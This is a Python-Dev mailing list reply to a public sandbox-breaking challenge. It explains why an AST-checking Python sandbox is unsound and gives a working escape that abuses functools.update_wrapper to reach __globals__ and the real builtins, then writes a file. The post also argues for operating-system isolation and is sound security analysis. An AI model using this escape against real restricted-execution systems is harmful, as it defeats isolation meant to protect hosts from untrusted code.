[Python-Dev] Challenge: Please break this! (a.k.a restricted mode revisited)

Tue Apr 12 08:16:57 EDT 2016

2016-04-08 16:18 GMT+02:00 Jon Ribbens <jon+python-dev at unequivocal.co.uk>:
> I've made another attempt at Python sandboxing, which does something
> which I've not seen tried before - using the 'ast' module to do static
> analysis of the untrusted code before it's executed, to prevent most
> of the sneaky tricks that have been used to break out of past attempts
> at sandboxes.

Right, it blocks the most trivial attacks against sandboxes. But you
have only fixed a few holes; there is still a wide range of holes
through which code can escape your sandbox.

I read your code and the code of CPython. I found many issues.

Your sandbox runs untrusted code in a new namespace. The game is to
get access to the outer namespace, the real Python namespace: for
example, the namespace of the unsafe module.

Your bet is that blocking access to "_" variables, using a whitelist
of modules and a few other protections is enough to block access to
the real namespace. The problem is that Python provides a very wide
range of tools for introspection.

I expected to find a hole using the C code, but in fact, it was much
simpler than that.

Your "safe import" hides real functions behind a proxy. OK. But the
code of modules still runs in the real namespace, whereas I expected
modules to run in the untrusted (restricted) namespace. The game is now
to find a way to retrieve content from the real namespace using any
function exposed in modules.
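
A minimal sketch of that point in plain CPython, without unsafe.py. The
restricted namespace and its one-entry whitelist are hypothetical
stand-ins for the sandbox, not its actual code. It only shows that
replacing the builtins of the untrusted namespace does not change what
an imported module's functions can reach:

```python
import base64
import builtins

# Hypothetical stand-in for the sandbox: a namespace whose builtins are
# replaced by a tiny whitelist (this is not the code of unsafe.py).
restricted_builtins = {"len": len}
untrusted_ns = {"__builtins__": restricted_builtins, "base64": base64}

# Code executed in the restricted namespace cannot see open() ...
try:
    exec("open", untrusted_ns)
    open_visible = True
except NameError:
    open_visible = False

# ... but a function defined in an imported module keeps a reference to
# that module's globals, which still point at the real builtins.
module_globals = base64.b64encode.__globals__
real_builtins = module_globals["__builtins__"]

# In CPython, __builtins__ is either the builtins module or its dict.
if isinstance(real_builtins, dict):
    real_open = real_builtins["open"]
else:
    real_open = real_builtins.open

print("open visible in restricted namespace:", open_visible)
print("real open reachable via module globals:", real_open is builtins.open)
```

The sandbox rejects a direct access to __globals__ from untrusted
source, so the remaining question is how to read that attribute
indirectly.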

I found functools.update_wrapper(). I was very surprised because this
function calls getattr() and setattr(), whereas your sandbox replaces
these builtin functions. In fact, the "safe" getattr and setattr are
only installed in the untrusted namespace, and as I wrote, the modules
run in the real Python namespace.
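
To illustrate, here is a small sketch run in plain Python, outside any
sandbox. The names src and Dst are made up for the example. It shows
that update_wrapper() copies whatever attribute names it is given in
"assigned", and that the name is passed as a string rather than written
as an attribute access:

```python
import functools


def src():
    """Stand-in for a function living in the real namespace."""


class Dst:
    """Plain object used as the destination of the copy."""


dst = Dst()

# The attribute name is only a string here, so a check of the source
# code for "_" attribute accesses has nothing to reject on this line.
functools.update_wrapper(dst, src, assigned=("__globals__",), updated=())

# update_wrapper() read the attribute from src and stored it on dst.
copied = vars(dst)["__globals__"]
print(copied is src.__globals__)
```

Reading the copied value back with vars() is only for the demonstration;
inside the sandbox the value has to be captured some other way.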

> I would be very interested to see if anyone can manage to break it.

So here you have:
---
import functools

# any proxy function from unsafe.py
import base64
src = base64.main

# hack to get any attribute of an object
def getattr(obj, attr):
    secret = None

    class A:
        def __setattr__(self, key, value):
            nonlocal secret
            if key == attr:
                secret = value

    dst = A()
    functools.update_wrapper(dst, src, assigned=(attr,), updated=())
    return secret

builtins = getattr(base64.main, "__globals__")["__builtins__"]

fn = "/tmp/owned"
with builtins.open(fn, "w") as f:
    f.write("game over!\n")
---

The exploit is based on two things:

* update_wrapper() is used to get the secret attribute using the real
getattr() function
* update_wrapper() + A.__setattr__ are used to pass the secret from
the real namespace to the untrusted namespace

> Bugs which are trivially fixable are of course welcomed, but the real
> question is: is this approach basically sound, or is it fundamentally
> unworkable?

You can block functools.update_wrapper(), or even the whole
functools module. But that will not fix the root cause: modules run in
the real namespace, when they must run in the untrusted namespace.

In pysandbox, I have code to ensure that all modules run in the
untrusted namespace: see CleanupBuiltins in sandbox/builtins.py. But
it was not enough: many vulnerabilities were found even with all my
protections.

I'm sure that many others will find other ways to escape your sandbox
with enough time. It's a matter of time, not a matter of whitelists.

As I wrote in my long explanation of why pysandbox is broken by design,
writing a sandbox inside CPython doesn't work. In fact, what you
want to restrict is access to limited resources like CPU and
memory, and to block access to the filesystem. This is the job of the
operating system, and external sandboxes help to block access to the
filesystem.
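
As a rough sketch of what "the job of the operating system" can look
like for CPU and memory, assuming a Unix system: the untrusted code
runs in a child process with limits set through the resource module.
The limit values and the helper names (lower_limit, apply_limits,
run_untrusted) are made up for the example. This does not block
filesystem access; that needs a separate OS mechanism, not shown here.

```python
import resource
import subprocess
import sys

CPU_SECONDS = 2                     # hypothetical CPU time limit
MEMORY_BYTES = 1024 * 1024 * 1024   # hypothetical address space limit


def lower_limit(limit, value):
    # Never ask for more than the current hard limit allows.
    _, hard = resource.getrlimit(limit)
    if hard != resource.RLIM_INFINITY:
        value = min(value, hard)
    resource.setrlimit(limit, (value, value))


def apply_limits():
    # Runs in the child process, just before the interpreter starts.
    lower_limit(resource.RLIMIT_CPU, CPU_SECONDS)
    lower_limit(resource.RLIMIT_AS, MEMORY_BYTES)


def run_untrusted(source):
    # -I starts the child interpreter in isolated mode.
    return subprocess.run(
        [sys.executable, "-I", "-c", source],
        preexec_fn=apply_limits,
        capture_output=True,
        text=True,
        timeout=10,
    )


result = run_untrusted("print(1 + 1)")
print(result.returncode, result.stdout.strip())
```

The limits are enforced by the kernel, so nothing the child does with
Python introspection can lift them.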

Victor